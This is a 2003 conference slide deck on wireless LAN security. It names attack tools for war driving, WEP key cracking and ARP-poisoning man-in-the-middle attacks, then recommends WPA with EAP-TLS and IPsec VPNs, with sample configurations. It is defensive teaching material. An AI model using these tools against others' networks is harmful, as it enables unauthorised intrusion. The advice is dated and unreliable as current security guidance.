ITG Informationstagung "Wireless LAN"

WLAN Sicherheit

Prof. Dr. Andreas Steffen

Zürcher Hochschule Winterthur
Zürcher
Hochschule
Winterthur

16.09.03 / WLAN_Security.ppt / Seite 1

Contents
• WLAN Threats
• WLAN WEP Encryption
• WLAN WEP Key Derivation
• WLAN Security: WPA / IEEE 802.1x
• WLAN Security: Virtual Private Networks
• VPN Gateways and VPN Clients
• Summary

16.09.03 / WLAN_Security.ppt / Seite 2

WLAN War Driving

16.09.03 / WLAN_Security.ppt / Seite 3

WLAN War Driving using NetStumbler

• NetStumbler available from http://www.netstumbler.com

• Laptop or PDA platform, optionally equipped with GPS device

16.09.03 / WLAN_Security.ppt / Seite 4

WLAN War Driving Map of Zurich

• >700 access points,

a majority of them with
disabled WEP encryption

Source:
Tages-Anzeiger, Oct. 14 2002

16.09.03 / WLAN_Security.ppt / Seite 5

Cain Password Recovery Tool

• Cain available from http://www.oxid.it

• ARP poisoning, SSH and HTTPS man-in-the-middle attacks

16.09.03 / WLAN_Security.ppt / Seite 6

Wired Equivalent Privacy (WEP)
24 40 / 104

IV Key RC4 PRNG IV

Payload CRC32 + Ciphertext

• “Weaknesses in the Key Scheduling Algorithm of RC4”

published by S. Fluhrer, I. Mantin & A. Shamir in August 2001
• By collecting weak 24–bit Initialization Vectors, 104–bit RC4 keys
can be cracked within hours or days depending on throughput.
• Attack implemented by AirSnort (http://airsnort.shmoo.com)
• Usually straight mapping of ASCII passwords into RC4 keys
• Weak passwords can be cracked using a brute force dictionary attack
written by ZHW students (http://wepattack.sourceforge.net)

WEP is weak and therefore next to useless !!!

16.09.03 / WLAN_Security.ppt / Seite 7

WEP Key Derivation

• Usually 5 or 13 ASCII characters are

directly mapped into a 40 or 104 bit
WEP key.
• Strong WEP key: 26 HEX symbols.
• 104 bit WEP key from truncated MD5 hash of arbitrary length passphrase.

16.09.03 / WLAN_Security.ppt / Seite 8

How to secure a WLAN?

16.09.03 / WLAN_Security.ppt / Seite 9

Wi-Fi Protected Access (WPA)
● Temporal Key Integrity Protocol (TKIP)
● Increased length of Initialization Vector (IV).
● Each WLAN packet is cryptographically secured by a
Message Integrity Checksum (MIC).
● Periodic Re-Keying (e.g. every hour)
● Extensible Authentication Protocol (EAP)
● IEEE 802.1x protocol controls network access.
● EAP-TLS, and Protected EAP (PEAP) protocols, respectively,
authenticate WLAN users via RADIUS authentication server.
● In the low-end SOHO area security will still be based on passwords
stored in the access point
Dictionary Attacks !
● WPA is a Makeshift Solution
● WPA is a forward-compatible subset of the forthcoming
IEEE 802.11i WLAN security standard.

16.09.03 / WLAN_Security.ppt / Seite 10

IEEE 802.1x Port–Based Network Access Control

EAP Over Wireless

(EAPOW)

Supplicant
(WLAN client)
uncontrolled controlled
port port EAP over RADIUS

Authenticator
(WLAN AP) Intranet

Authentication Server
(RADIUS)

16.09.03 / WLAN_Security.ppt / Seite 11

IEEE 802.1x based on EAP–TLS
● Supported by Windows XP

● True Security
16.09.03 / WLAN_Security.ppt / Seite 12
IEEE 802.1x based on PEAP
● Supported by Windows XP

● Dictionary Attacks !

16.09.03 / WLAN_Security.ppt / Seite 13

 Virtual Private Networks
 Wireless VPN clients tunnel 100% of their
VPN Client
IP traffic over the insecure air link using
VPN Tunnel the peer network subnet mask 0.0.0.0/0.
0.0.0.0/0  Strong encryption and authentication.
Wireless
Intranet User
WLAN Access
Point
DMZ Interface

Private Internet
Intranet

Intranet VPN Gateway

Server / Firewall

16.09.03 / WLAN_Security.ppt / Seite 14

Linux FreeS/WAN as a VPN Gateway
• Available from www.freeswan.ca / www.strongsec.com
• OpenSource IPsec stack for Linux Systems
• X.509 certificate based authentication developed by ZHW !
• Easy installation via RedHat/SuSE/Debian/Mandrake RPMs
• Commercial CD-Firewall version available form www.astaro.de
• Number of VPN tunnels is limited by hardware resources, only.
• Linux Free/SWAN can also be used as a VPN client
• Simple configuration: %cert
gwCert
conn wlan
right=%any
rightrsasigkey=%cert
rightsubnetwithin=10.3.0.0/16
left=%defaultroute
leftsubnet=0.0.0.0/0 leftsubnet
leftcert=gwCert.pem
auto=add left right

16.09.03 / WLAN_Security.ppt / Seite 15

Windows 2000/XP VPN Client
• Windows 2000/XP comes with a built-in IPsec stack
• Configuration via the mmc management console is tiresome!
• OpenSource tool from http://vpn.ebootis.de loads text-based
configuration directly into Windows registry:
conn wlan
left=%any # insert client IP
right=10.3.0.1 # gateway IP
rightsubnet=* # home network
rightca=”C=CH,O=ZHW,CN=ZHW CA” # certification authority
network=lan # lan/ras/auto
auto=start

• WLAN clients can tunnel whole IP traffic to VPN gateway

• Commercial VPN clients: SSH Sentinel, SafeNet/Soft Remote

16.09.03 / WLAN_Security.ppt / Seite 16

Summary
● WLANs are extremely vulnerable, even with WEP encryption!
● Latest WLAN access point models are equipped with WPA.
● WPA mends the coarsest WEP security holes.
IEEE 802.11i WLAN security standard is still a long way off.
● WPA is secure only in conjunction with a RADIUS infrastructure
and EAP-TLS authenticaton.
● The "poor man's" WPA solution will still be based on
[weak] passwords.
● An efficient and cryptographically secure alternative is the use
of an IPsec-based Virtual Private Network on top of WLAN.
● Low-cost VPN solutions for Linux, Windows and MacOS
platforms are readily available.

Further information available from http://security.zhwin.ch

16.09.03 / WLAN_Security.ppt / Seite 17